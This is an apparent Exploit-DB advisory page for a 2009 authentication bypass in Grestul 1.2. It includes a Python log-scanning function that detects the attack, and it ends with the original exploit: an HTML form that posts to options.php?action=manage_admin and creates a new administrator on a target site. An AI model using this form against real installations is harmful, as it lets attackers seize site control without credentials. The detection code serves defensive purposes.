vendor: Grestul 1.2
by: ThE g0bL!N
CVSS: 9,3 (HIGH)
Remote Code Execution
CWE: 20
Product Name: Grestul 1.2
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: YES
Related CWE: N/A
CPE: a:grestul:grestul:1.2
2009

Grestul 1.2 Remote add admin exploit

A vulnerability in Grestul 1.2 allows a remote attacker to add an admin user to the system. The attacker sends a POST request to the options.php page (action=manage_admin) with the username and password of the new admin user. The vulnerability is due to insufficient input validation and authentication checks.

Mitigation:

The vendor has released a patch to address this vulnerability.
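
For sites that cannot confirm the patch was applied, the request described above can be looked for in web server access logs. The following is an added example, not code from the advisory or from Grestul: it assumes Combined Log Format, and the function name, the host name "blog.example" and the admin address allowlist are hypothetical.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)

def suspicious_admin_adds(lines, site_host, admin_ips=frozenset()):
    """Flag POSTs to options.php?action=manage_admin that come from an address
    outside the admin allowlist or that carry no same-site Referer."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["method"] != "POST":
            continue
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/options.php"):
            continue
        if "manage_admin" not in parse_qs(url.query).get("action", []):
            continue
        reasons = []
        if m["ip"] not in admin_ips:
            reasons.append("source not in admin allowlist")
        # hostname is None for "-"; Referer is client-controlled, so it is a hint only.
        if urlsplit(m["referer"]).hostname != site_host:
            reasons.append("referer missing or off-site")
        if reasons:
            hits.append({"ip": m["ip"], "time": m["time"],
                         "status": int(m["status"]), "reasons": reasons})
    return hits

# Constructed sample lines: documentation addresses, hypothetical host "blog.example".
REQ = '"POST /admin/options.php?action=manage_admin HTTP/1.1" 200 512'
SAMPLE = [
    f'198.51.100.7 - - [08/Jun/2009:10:01:02 +0000] {REQ} "-" "Mozilla/5.0"',
    f'192.0.2.10 - - [08/Jun/2009:09:00:00 +0000] {REQ} '
    '"http://blog.example/admin/options.php" "Mozilla/5.0"',
    f'192.0.2.10 - - [08/Jun/2009:09:30:00 +0000] {REQ} '
    '"http://other.example/form.html" "Mozilla/5.0"',
    '192.0.2.10 - - [08/Jun/2009:09:31:00 +0000] '
    '"GET /admin/options.php?action=manage_admin HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_admin_adds(SAMPLE, "blog.example", {"192.0.2.10"}):
        print(hit)
```

Any hit should be compared against the list of admin accounts actually present in the installation.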

Exploit-DB raw data:

Grestul 1.2 Remote add admin exploit
Founder: ThE g0bL!N
------
Home: http:/www.4ckx.com/dz/
----
Vendor:http://grestul.com/
Note: Algerie 3-1 Egypt

code
-----
<form method="post" name="add_admin" id="add_admin" action="http://grestul.com/demo/admin/options.php?action=manage_admin">
  <label for="username_new" class="label_newpage">Username:</label><br /><input type="text" name="username_new" id="username_new" class="input_newpage" value="" />
  <br /><br /><label for="password" class="label_newpage">New Password:</label><br /><input type="password" name="password" id="password" class="input_newpage" value="" />
  <br /><br /><label for="con_password" class="label_newpage">Confirm Password:</label><br /><input type="password" name="con_password" id="con_password" class="input_newpage" value="" />
  <br /><input type="submit" name="add_admin" id="add_admin" value="Add Admin" class="submit_newpage" />
  </form></div>
---------------------------------------------------------------------------------------------------------

# milw0rm.com [2009-06-08]